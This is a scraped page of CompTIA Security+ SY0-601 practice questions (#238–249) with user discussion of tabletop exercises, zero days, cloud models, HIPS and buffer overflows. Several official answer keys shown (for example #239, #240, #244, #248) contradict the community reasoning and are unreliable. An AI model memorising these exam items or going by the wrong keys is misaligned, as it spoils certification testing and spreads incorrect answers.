https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 408/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 6 times
  Dachosenone 3 months, 3 weeks ago
"Badges, We don't need no stinking badges."
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 409/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #238 Topic 1

An organization’s Chief Security Officer (CSO) wants to validate the business’s involvement in the incident response plan to ensure its validity and
thoroughness. Which of the following will the CSO MOST likely use?

A. An external security assessment

B. A bug bounty program

C. A tabletop exercise

D. A red-team engagement

Correct Answer: C

Community vote distribution


C (60%) A (33%) 7%

  alwaysrollin247 1 month, 1 week ago


Selected Answer: D
A red team consists of security professionals who act as adversaries to overcome cyber security controls. Red teams often consist of
independent ethical hackers who evaluate system security in an objective manner.

They utilize all the available techniques to find weaknesses in people, processes, and technology to gain unauthorized access to assets. As a
result of these simulated attacks, red teams make recommendations and plans on how to strengthen an organization’s security posture.

https://purplesec.us/red-team-vs-blue-team-cyber-security/
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 2 times

  zf1343 2 weeks, 6 days ago


Question is not asking to identify vulnerabilities or exploit security weaknesses. It's about incident response plan.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The CSO is most likely to use a tabletop exercise to validate the organization's involvement in the incident response plan. A tabletop exercise is a
type of simulation that involves a group of participants discussing and responding to a hypothetical security incident. The scenario is typically
discussed in a group setting, with participants representing different roles and departments within the organization. The goal of a tabletop
exercise is to assess the organization's readiness to respond to a security incident, identify any gaps or weaknesses in the incident response
plan, and determine how effectively different teams and individuals can work together to respond to the incident
upvoted 3 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: C
its internal so my vote is deciding here i agree with c :)
upvoted 1 times

  Sir_Learnalot 3 months ago


Selected Answer: C
I´d go with C as you want to check for the "business´s involvement". An external entity might not be involved with your actuall business. With a
tabletop exercise you can get the people involved with the respose procedure who will actually have to do something when an incident occurs
and know the business best and the impact that an incident would have on it
upvoted 1 times

  Ron9481 3 months, 2 weeks ago


Selected Answer: C
I think C. This job can be accomplished with an tabletop exercise. It is within the CSO’s capability. Anything external would need approval from
the boss and require more resources. Just my opinion.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Selected Answer: A
Tabletop is more for practice
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 410/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  alayeluwa 3 months, 3 weeks ago


Selected Answer: A
An external body that will not be biased about any of the team member’s capability will get the job done, Mr. CSO.
upvoted 3 times

  Kashim 3 months, 3 weeks ago


Selected Answer: C
C correct
upvoted 3 times

  [Removed] 3 months, 3 weeks ago


Care to offer any reasoning? Because to truly test the validity of their incident response plan I would hire an external security assessment.
upvoted 5 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 411/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #239 Topic 1

Which of the following documents provides guidance regarding the recommended deployment of network security systems from the
manufacturer?

A. Cloud control matrix

B. Reference architecture

C. NIST RMF

D. CIS Top 20

Correct Answer: D

Community vote distribution


B (100%)

  dansecu Highly Voted  3 months, 4 weeks ago


Selected Answer: B
Correct answer is B, becouse the vendorrs are responsble for their products and solutions and they are providing reference arhitectures.
CIS Top 20 - is a security controls framework..
upvoted 10 times

  [Removed] Highly Voted  3 months, 3 weeks ago


Selected Answer: B
A reference architecture is a document or set of documents that provides recommended structures and integrations of IT products and services
to form a solution.
upvoted 5 times

  ronniehaang Most Recent  4 days ago


Selected Answer: B
B. Reference Architecture

A reference architecture provides a blueprint for deploying a specific technology solution, including the network security systems. It outlines the
recommended deployment architecture, components, and technologies that are necessary for a secure and effective deployment of the solution.
The reference architecture provides step-by-step instructions on how to implement the solution, ensuring that all necessary security measures
are taken and that the deployment is done in the most secure manner possible. It provides best practices, design patterns, and guidelines to help
organizations ensure the security and stability of their network security systems.
upvoted 1 times

  asum 2 weeks, 4 days ago


Enterprise reference architecture (ea.cloudsecurityalliance.org)—best practice
methodology and tools for CSPs to use in architecting cloud solutions. The
solutions are divided across a number of domains, such as risk management and
infrastructure, application, and presentation services.
upvoted 1 times

  [Removed] 1 month, 2 weeks ago


Is kinda impossible to look something over the internet that talks about this reference architecture thing.. Compare to CIS Top 20 that talks about
network security and it looks as a better answer for CIS Top 20. But who knows.. I could be wrong..
upvoted 1 times

  carpathia 2 months, 1 week ago


I am not sure about this ref arch. I have actually found it in Conklin's book, but under Cloud Security, pg 587
upvoted 1 times

  carpathia 2 months, 3 weeks ago


I haven't seen this Reference Architecture in any of the Comptia books, videos etc. It doesn't mean it doesn't exist and can be used in th exam.
upvoted 2 times

  G4ct756 3 months, 1 week ago


Selected Answer: B
Definitely B.
For example : aws's Reference Architecture Examples and Best Practices site.
https://aws.amazon.com/architecture/
- includes best practices , example and recommendations for aws environment usage.
upvoted 2 times

  Mahougbe 3 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 412/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
Answer is B
upvoted 2 times

  passmemo 3 months, 3 weeks ago


Selected Answer: B
A reference architecture is a document or set of documents that provides recommended structures and integrations of IT products and services
to form a solution.
upvoted 4 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: B
Answer is B.
upvoted 3 times

  ksave 3 months, 3 weeks ago


Selected Answer: B
Reference architecture provides best security practices
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 413/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #240 Topic 1

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release
a patch within the next quarter. Which of the following BEST describes this type of vulnerability?

A. Legacy operating system

B. Weak configuration

C. Zero day

D. Supply chain

Correct Answer: A

Community vote distribution


C (83%) A (17%)

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: C
"OS vendor was unaware" it indicates Zero Day
upvoted 12 times

  JohnMangley Highly Voted  3 months, 3 weeks ago


Selected Answer: C
It sounds like a Zero day as the OS vendor was unaware of the vulnerability.
upvoted 5 times

  Action Most Recent  15 hours, 23 minutes ago


I was wondering if this can be supply chain since is coming from an OS Vendor
upvoted 1 times

  Action 15 hours, 21 minutes ago


If supply chain isn’t the answer then I’ll go with Zero day because option A means it’s an outdated OS and usually without vendor support,
clear the OS in question still has vendor support
upvoted 1 times

  Alizadeh 1 month, 2 weeks ago


Selected Answer: C
The correct answer is C. Zero day.

A zero-day vulnerability is a previously unknown vulnerability in software or hardware that is exploited by attackers before the vendor becomes
aware of the issue and releases a patch. In this case, the OS vendor was unaware of the vulnerability and promised to release a patch within the
next quarter, indicating that it is a zero-day vulnerability.
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


A. Legacy is the answer…
upvoted 1 times

  Sandon 1 month, 2 weeks ago


No, it's not
upvoted 1 times

  Lv2023 1 month, 3 weeks ago


Selected Answer: C
Answer is "C" as per Comptia this is why "A" is not the answer:
A legacy platform is one that is no longer supported with security patches by its developer or vendor. This could be a PC/laptop/smartphone,
networking appliance, peripheral device, Internet of Things device, operating system, database/programming environment, or software
application. By definition, legacy platforms are unpatchable.
upvoted 1 times

  ksave 3 months ago


Selected Answer: A
My answer would be Legacy OS. Reason: The question said the patch would be available in the next quarter. This sounds more of EOL. For zero
day attacks, the solution must come in the next 2 to 3 days.
upvoted 4 times

  Sandon 1 week, 2 days ago


You are incorrect sir. There is no time limit for a zero-day patch

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 414/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  NICKJONRIPPER 2 months, 1 week ago
no widespread use, not the case, they are still using
upvoted 1 times

  NICKJONRIPPER 2 months, 1 week ago


legacy operating system, is an operating system (OS) no longer in widespread use, or that has been supplanted by an updated version of
earlier technology.
upvoted 1 times

  papisam 3 months, 1 week ago


but if they promised to release a patch then it can not be Zero Day.
upvoted 4 times

  Sandon 1 week, 2 days ago


Wrong, now that they know about it, it is no longer a zero-day. But it was
upvoted 1 times

  Iphy23 3 months, 2 weeks ago


i still dont understand why the answers from this forum is wrong compared to the votes...
upvoted 2 times

  SOK_I 2 months, 2 weeks ago


I saw on the answer threads in the early 100ish answers that Examtopics has to keep the *actual* answer hidden, otherwise CompTIA would
not allow Examtopics to post their questions verbatim.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


And we never will.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 415/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #241 Topic 1

Which of the following is a targeted attack aimed at compromising users within a specific industry or group?

A. Watering hole

B. Typosquatting

C. Hoax

D. Impersonation

Correct Answer: A

Community vote distribution


A (100%)

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: A
Through process of elimination alone it's A.

If you end up getting stuck on a CompTIA test remember this:

- A completely wrong answer


- A correct answer
- A CompTIA correct answer (the one you want)
- An answer that sounds good because you didn't study
upvoted 9 times

  Skelter117 Highly Voted  3 months, 2 weeks ago


Selected Answer: A
Watering hole is correct but if they change the answers to spear phishing being one, that may be the new answer just a heads up.
upvoted 7 times

  passmemo Most Recent  3 months, 3 weeks ago


Selected Answer: A
A watering hole attack is a targeted attack designed to compromise users within a specific industry or group of users by infecting websites they
typically visit and luring them to a malicious site.
upvoted 5 times

  serginljr 3 months, 4 weeks ago


Selected Answer: A
A correct
upvoted 5 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 416/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #242 Topic 1

To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud
provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would BEST
accommodate the request?

A. IaaS

B. PaaS

C. DaaS

D. SaaS

Correct Answer: B

Community vote distribution


B (55%) D (45%)

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: B
"The cloud provider and the organization must have security controls to protect sensitive data." If you want to have some part of administrative
controll, you have to go with PaaS. SaaS is not enaugh in this case.
upvoted 11 times

  Sandon 1 week, 2 days ago


"Software and infrastructure" = SaaS
upvoted 1 times

  Knowledge33 2 months, 3 weeks ago


I disagree. ACcording to COmptia, PaaSonly allows client to manage its database, but with SaaS, they can't. O365 is a SaaS, and client can
manage the security policy.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Have, not implement
upvoted 1 times

  Dachosenone Highly Voted  3 months, 3 weeks ago


"SaaS allows people to use cloud-based web applications. In fact, email services such as Gmail and Hotmail are examples of cloud-based SaaS
services."
upvoted 8 times

  ronniehaang Most Recent  4 days ago


Selected Answer: D
D. SaaS (Software as a Service) is the best option to accommodate the request to move email services to the cloud while protecting sensitive
data. SaaS is a delivery model for software applications where the provider hosts the application and makes it available to customers over the
internet. SaaS provides customers with the benefits of cloud computing such as scalability, low cost, and quick implementation without the need
for expensive hardware, software, and support infrastructure. SaaS providers also have security controls in place to protect sensitive data, such
as encryption, data backup, and disaster recovery. With SaaS, the customer's sensitive data is stored and processed on the provider's
infrastructure, reducing the customer's responsibility for securing the data and providing peace of mind.
upvoted 1 times

  Sandon 1 week, 2 days ago


Selected Answer: D
According to ChatGPT

D. SaaS (Software as a Service)

SaaS (Software as a Service) is a cloud service model that allows organizations to access and use software applications over the internet,
without having to maintain or support the underlying infrastructure. SaaS providers are responsible for maintaining and updating the software and
infrastructure, which can help to reduce and limit software and infrastructure costs. In the case of email services, a SaaS provider would host and
manage the email system, including security controls to protect sensitive data.

IaaS (Infrastructure as a Service) provides virtualized computing resources over the internet, it doesn't cover email services.
PaaS (Platform as a Service) provides a platform for the development, running and management of applications, it doesn't cover email services.
DaaS (Desktop as a Service) provides virtualized desktop environments, it doesn't cover email services.
upvoted 1 times

  Ranaer 3 days, 23 hours ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 417/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

And upon further questioning, such as:


However in the question it is explicitly stated that the organizations MUST be able to place security controls to protect sensitive data. While
SaaS offers some security controls, its vastly limited in comparison to PaaS.

ChatGPT answers:
Yes, that is correct. When the requirement is to have security controls in place to protect sensitive data, PaaS (Platform as a Service) would
likely be a better fit than SaaS (Software as a Service), as PaaS provides a more flexible and customizable environment for organizations to
deploy and manage their applications and security controls. With PaaS, the organization can control the infrastructure, middleware, and
security measures to meet its specific requirements for protecting sensitive data. On the other hand, with SaaS, the organization relies on the
cloud provider to manage and secure the infrastructure, middleware, and security measures, which may not meet the organization's specific
needs and requirements.
upvoted 1 times

  MattClark_7 2 weeks, 2 days ago


Selected Answer: B
SaaS is a bespoke vender application that cannot be modified and you use it with a pay-per-use model, as a subscription, and you cannot
migrate any applications or services to any SaaS environment. So the answer cannot be D. In the question it states they would like to move their
current email service to the cloud. This is not possible with SaaS. However with PaaS you could migrate your custom software applications.
3. The goal is of all of this is to reduce costs. SaaS is a more expensive option as it is a subscription service that is provided by the CSP through
a web server.
Ref: Ian Neil CompTIA Security+: SY0-601 Certification Guide Second Edition
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 1 times

  nicekoda 1 month, 1 week ago


Answer is B. According to the UK's National Cyber Security Centre (NCSC), SaaS security rules, the client and the service provider or software
distributor must share security responsibilities
upvoted 2 times

  Ranaer 1 month, 2 weeks ago


Selected Answer: B
I believe the answer to be B simply because it is explicitly said that "organization must have security controls". With SaaS you are sacrificing a
bigger part of that control, if not almost all, with PaaS you keep some of that control to be able to enforce some of the rules which you need.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: D
SAAS provides complete service
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: B
Definitely PaaS
upvoted 1 times

  Sanjucbsa 1 month, 3 weeks ago


Selected Answer: D
https://www.bigcommerce.com/articles/ecommerce/saas-vs-paas-vs-iaas/
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The best option to accommodate the request would be to use a Software as a Service (SaaS) provider for email services. SaaS providers
typically offer a variety of security controls to protect sensitive data and can help reduce and limit software and infrastructure costs by providing
email services on a subscription basis. IaaS, PaaS, and DaaS are all different types of cloud services that may not be as well suited for this
particular use case.
upvoted 1 times

  Lv2023 1 month, 3 weeks ago


Selected Answer: B
PaaS meets the requirements of needing to both the service provider and organization needing to have respective controls.
upvoted 2 times

  Pgvicky 1 month, 4 weeks ago


I saw limit and reduce software so I went with PaaS
upvoted 1 times

  Nome02 2 months ago


Correct D - SaaS is the best and only choice as it is currently being used in the industry for email services.
upvoted 1 times

  Nome02 2 months ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 418/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

and who are saying SaaS doesn't allow security, you can configure the SaaS services in verity of ways using encryption, enhanced
authentication, SSPM etc.
upvoted 1 times

  tek7ila 2 months ago


Selected Answer: B
Hard question, but with SaaS you have no control over security so I would go with PaaS.
upvoted 2 times

  Cavs_ 2 months ago


Selected Answer: D
It's D
https://rubygarage.org/blog/iaas-vs-paas-vs-saas#:~:text=In%20fact%2C%
upvoted 1 times

  mmains 2 months, 1 week ago


Selected Answer: B
IaaS provides you the most freedom of control as it lets you manage your applications, data, middleware, and operating system. On the other
hand, PaaS allows you to manage your data and applications only, and with SaaS, everything is managed by your service provider.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 419/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #243 Topic 1

A security engineer is concerned that the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer
would like a tool to monitor for changes to key files and network traffic on the device. Which of the following tools BEST addresses both detection
and prevention?

A. NIDS

B. HIPS

C. AV

D. NGFW

Correct Answer: B

Community vote distribution


B (86%) 14%

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: B
A host-based intrusion detection and prevention system (HIPS) is a tool that monitors for changes to key files and network traffic on a device
upvoted 7 times

  Jimbobilly Most Recent  1 month, 3 weeks ago


Selected Answer: B
It's HIPS
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best tool for monitoring changes to key files and network traffic on a device, as well as providing detection and prevention capabilities, is a
host-based intrusion prevention system (HIPS). A HIPS monitors changes to key files and network traffic on a single device, and can detect and
prevent malicious activities by comparing the current state of the system to a known good state. In contrast, a network-based intrusion detection
system (NIDS) only monitors network traffic for signs of malicious activity and does not provide prevention capabilities. An antivirus (AV) program
only detects and removes malware from a device, and does not monitor changes to key files or network traffic. A next-generation firewall (NGFW)
monitors and controls network traffic, but does not provide the detailed monitoring and prevention capabilities of a HIPS.
upvoted 1 times

  J_Ark1 2 months, 3 weeks ago


why not d, next gen firewall?
upvoted 1 times

  JStevie 2 months, 2 weeks ago


I believe it's not NGFW because the question states it wants to monitor changes on the device itself, not the entire network. The only other
option that can detect and prevent is HIPS
upvoted 2 times

  03allen 3 months, 1 week ago


Selected Answer: A
Why not a NIDS?

A network-based intrusion detection system (NIDS) detects malicious traffic on a network. NIDS usually require promiscuous network access in
order to analyze all traffic, including all unicast traffic.
upvoted 2 times

  Sir_Learnalot 3 months ago


It would not meet all criterias asked in the question as a NIDS is not able to monitor key files on a endpoint.
upvoted 1 times

  Granddude 3 months, 3 weeks ago


Selected Answer: B
A host-based intrusion prevention system (HIPS) is a system or a program employed to protect critical computer systems containing crucial data
against viruses and other Internet malware. Starting from the network layer all the way up to the application layer, HIPS protects from known and
unknown malicious attacks.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 420/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #244 Topic 1

During a recent incident, an external attacker was able to exploit an SMB vulnerability over the internet. Which of the following action items should
a security analyst perform FIRST to prevent this from occurring again?

A. Check for any recent SMB CVEs.

B. Install AV on the affected server.

C. Block unneeded TCP 445 connections.

D. Deploy a NIDS in the affected subnet.

Correct Answer: A

Community vote distribution


C (100%)

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: C
C. Block unneeded TCP 445 connections. - only blocking unneeded SMB can have "preventive" character.
upvoted 9 times

  Tuncyber Most Recent  1 month, 2 weeks ago


A. Because it is important to know which vulnerabilities are warned and reported.
upvoted 2 times

  Sir_Learnalot 3 months ago


Selected Answer: C
I´d also go with C
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
I'm going with C here too.
upvoted 2 times

  KelvinNguyen3011 3 months, 3 weeks ago


I agreed with C
upvoted 2 times

  JohnMangley 3 months, 3 weeks ago


Selected Answer: C
Blocking unneeded TCP 445 connections should be performed FIRST as it would prevent the SMB vulnerability from being used.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 421/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #245 Topic 1

A penetration tester is fuzzing an application to identify where the EIP of the stack is located on memory. Which of the following attacks is the
penetration tester planning to execute?

A. Race-condition

B. Pass-the-hash

C. Buffer overflow

D. XSS

Correct Answer: C

Community vote distribution


C (100%)

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The penetration tester is planning to execute a buffer overflow attack. A buffer overflow attack is a type of security vulnerability that occurs when
a program attempts to write data to a memory buffer that is too small to hold it. This can cause the program to crash or, in some cases, allow an
attacker to execute arbitrary code. One way to identify where the EIP of the stack is located on memory is to use a technique called fuzzing,
which involves sending large amounts of data to an application in order to identify areas where the application is vulnerable to buffer overflow
attacks
upvoted 2 times

  Knowledge33 2 months, 4 weeks ago


EIP is a register in x86 architectures (32bit). It holds the "Extended Instruction Pointer" for the stack. In other words, it tells the computer where to
go next to execute the next command and controls the flow of a program.
upvoted 3 times

  ostralo 3 months, 2 weeks ago


EIP stands for Extended Instruction Pointer and is used to track the address of the current instruction running inside the application.
upvoted 1 times

  ostralo 3 months, 2 weeks ago


https://security.stackexchange.com/questions/129499/what-does-eip-stand-for

EIP - 33

EIP is a register in x86 architectures (32bit). It holds the "Extended Instruction Pointer" for the stack. In other words, it tells the computer where to
go next to execute the next command and controls the flow of a program.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Whats an eip?
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


EIP stands for Extended Instruction Pointer and is used to track the address of the current instruction running inside the application.
upvoted 1 times

  Granddude 3 months, 3 weeks ago


Selected Answer: C
https://www.imperva.com/learn/application-security/buffer-A buffer overflow (or buffer overrun) occurs when the volume of data exceeds the
storage capacity of the memory buffer. As a result, the program attempting to write the data to the buffer overwrites adjacent memory locations
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 422/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #246 Topic 1

Server administrators want to configure a cloud solution so that computing memory and processor usage is maximized most efficiently across a
number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should
administrators configure to maximize system availability while efficiently utilizing available computing power?

A. Dynamic resource allocation

B. High availability

C. Segmentation

D. Container security

Correct Answer: A

Community vote distribution


A (100%)

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
To maximize system availability and efficiently utilize available computing power, administrators should configure dynamic resource allocation.
Dynamic resource allocation is a technique that allows a system to automatically adjust the allocation of resources, such as memory and
processing power, to different applications or processes in response to changing workloads or conditions. This can help to ensure that
computing resources are used efficiently and that the system is able to respond to changes in demand without encountering performance issues
or becoming unavailable.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
If they need to scale usage upwards and downwards A is the only one that makes sense here.
upvoted 3 times

  jspecht 3 months, 2 weeks ago


Selected Answer: A
Dynamic resource allocation lets you scale resources up or down as needed to be more efficient.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 423/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #247 Topic 1

While reviewing the wireless router, a systems administrator of a small business determines someone is spoofing the MAC address of an
authorized device. Given the table below:

Which of the following should be the administrator’s NEXT step to detect if there is a rogue system without impacting availability?

A. Conduct a ping sweep,

B. Physically check each system.

C. Deny internet access to the "UNKNOWN" hostname.

D. Apply MAC filtering.

Correct Answer: D

Community vote distribution


A (66%) B (29%) 5%

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: A
NEED FOR PING SWEEP
Ping sweep is used for various purposes, such as improving and maintaining network security. It can also be used to:

Discover active IP addresses on the network


Ensure IP addresses on the network match the documentation
Detect rogue devices connected to the network
upvoted 11 times

  NXPERT 3 months, 2 weeks ago


the "Unknown" device is already discovered, you don't need ping sweep to detect it again.
upvoted 5 times

  Sandon 1 week, 2 days ago


"NEXT step to detect" The question is literally asking you to DETECT
upvoted 2 times

  Littlelarry123 3 months, 2 weeks ago


I agree with you plus it also says without impacting availability. You can just do a ping without affecting anyone work. Going to physical check
is affecting availability. Looking at the people who pick B are drunk.
upvoted 2 times

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: B
If it is a small office "B. Physically check each system. " should be done, as it seems to be the most accurate.
upvoted 5 times

  Ranaer Most Recent  2 weeks, 2 days ago


Selected Answer: A
B is a stupid answer. Its a Wifi network. Yeah, you can go check all the devices in the office, what if the malicious machine is on the parking lot
below the windows of the office???? You will go and check every single machine in range of the WAP? Its absurd.
You do a ping sweep, determine which machines are connected right now and work from there.
upvoted 2 times

  Blueteam 2 months, 1 week ago


Option A is the first step.
Is there a unknown device connected to the network now?
Lets see by conducting a ping sweep.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 424/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Deny internet access to the "UNKNOWN" hostname.

The unknown host has been discovered to theres no need to be detected again just deny access.
=====================

(A) A ping sweep (also known as an ICMP sweep) is a basic network scanning technique used to determine which of a range of IP addresses
map to live hosts on the network. We don't need to do this since the UNKNOWN host has been identified already

(B) No

(D) The scenario mentioned how the MAC address was spoofed so filtering by MAC addresses won't help here
upvoted 2 times

  Ashbash95 2 months, 4 weeks ago


Selected Answer: B
Answer is b
upvoted 2 times

  Knowledge33 2 months, 4 weeks ago


Selected Answer: A
I don't understand why some guys prefer response b. How is it possible to locate all devices? We're talking about wifi. The acministrator can't
know the location of all devices. Even though the administrator can physically check anything, what should him check? the android network
config? The apple network config? If He isn't familiar with an OS, how can he does it. Response b is totally False.
upvoted 3 times

  J_Ark1 3 months ago


Selected Answer: A
Ping Sweep detects networks and reveals devices conected, for B it doesnt make sense because it says that it is a wireless network, so how can
you physically go around checking every single device conected to the network, imagine if it where a company employing over 1000 staff, Ping
Sweep to me makes sense in this situation. MAC filtering would restrict access so no to that via process of elimination.
upvoted 3 times

  comeragh 3 months, 1 week ago


Selected Answer: B
I would go with B here and on previous 601 exam this question listed physically check each system as best answer as per discussions
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


MAC Filtering wont help with as spoofed MAC address
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
It's a ping sweep even though it seems odd dealing with MAC addresses. It's the only one that makes sense too

In addition to identifying active devices on a network, ping sweeps are also helpful at detecting unrecognized devices that may be malicious and
ensuring devices are functioning correctly.
upvoted 2 times

  ostralo 3 months, 2 weeks ago


Selected Answer: A
It is a wireless network and we might not know where those devices are located.
The question mentioned that it is a small business but we cannot assume that there are only 4~10 devices..

Visit each post to do ipconfig isn't efficient enough.

I would perform ping sweep against all the known hosts and compare it with the arp table.
upvoted 4 times

  andrizo 3 months, 3 weeks ago


I dont like this question, mac spoofing usually means repeated mac addresses
upvoted 2 times

  serginljr 3 months, 4 weeks ago


Selected Answer: B
B correct
upvoted 2 times

  Ha9ate 3 months, 4 weeks ago


Selected Answer: B
Agree B
upvoted 1 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 425/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #248 Topic 1

A security analyst in a SOC has been tasked with onboarding a new network into the SIEM. Which of the following BEST describes the information
that should feed into a SIEM solution in order to adequately support an investigation?

A. Logs from each device type and security layer to provide correlation of events

B. Only firewall logs since that is where attackers will most likely try to breach the network

C. Email and web-browsing logs because user behavior is often the cause of security breaches

D. NetFlow because it is much more reliable to analyze than syslog and will be exportable from every device

Correct Answer: B

Community vote distribution


A (100%)

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: A
SIEM works best only if have "A. Logs from each device type and security layer to provide correlation of events ".

Firewall logs are not enough during IR process


upvoted 11 times

  Sir_Learnalot Most Recent  3 months ago


Selected Answer: A
"A" should be the right exam answer. In the real world, you might have to be a bit more picky which logs to choose, as you´d have limitations like
EPS based licenses for your SIEM or limited hardware resources, so it´s not always the best solution to feed everything to your SIEM.
upvoted 1 times

  Picvet 3 months, 1 week ago


B may be the answer because we are talking about a new network. Network is associated with firewall based rules.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Nah. Firewalls are also not the only way an attacker can access resources either.
upvoted 2 times

  nobnarb 3 months, 2 weeks ago


Selected Answer: A
I think it's A because SIEM needs massive amounts of information to be efficient.
B is wrong because it says ONLY firewall logs, which would not give you enough information to respond to the totality of a circumstance.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 426/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #249 Topic 1

An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection
mechanism to deter malicious activities. Which of the following is being implemented?

A. Proximity cards with guards

B. Fence with electricity

C. Drones with alarms

D. Motion sensors with signage

Correct Answer: D

Community vote distribution


D (84%) Other

  Ha9ate Highly Voted  3 months, 4 weeks ago


Selected Answer: D
I think D is correct.
"must be notified prior to encountering the detection mechanism"
notified=singnage
detection=sensors
upvoted 13 times

  Dachosenone Highly Voted  3 months, 3 weeks ago


Personal tip: Don't pee on an electrical fence.
upvoted 12 times

  Gino_Slim 3 months, 1 week ago


That's solid advice. I appreciate that.
upvoted 2 times

  Sir_Learnalot Most Recent  2 months, 3 weeks ago


Selected Answer: C
Not sure about this, but C would for me be something you should inform your citizens about. I know at least in europe there are strong
regulations for usage of drones, and I could understand that you need to inform citizens about them when you want to use them. But open for
discussion...I´m really not sure about this one
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 1 times

  Jay007006 3 months, 1 week ago


I'm confused by the answers given here. I've never once seen a sign warning of motion sensors. Electric fences, on the other hand, are always
labeled.
upvoted 1 times

  nobnarb 3 months, 2 weeks ago


Selected Answer: D
The question states they must be NOTIFIED. A fence definitely won't whisper in your ear.
upvoted 5 times

  Granddude 3 months, 3 weeks ago


Selected Answer: D
B would be a deterrent. D is detection
upvoted 3 times

  Skelter117 3 months, 3 weeks ago


Signage is a deterrent. Motion sensors are detective.
upvoted 1 times

  chipdomcobb 3 months, 4 weeks ago


I think D is correct. The question says that "citizens must be notified prior to encountering the detection mechanism".
upvoted 2 times

  Kashim 3 months, 4 weeks ago


Selected Answer: B

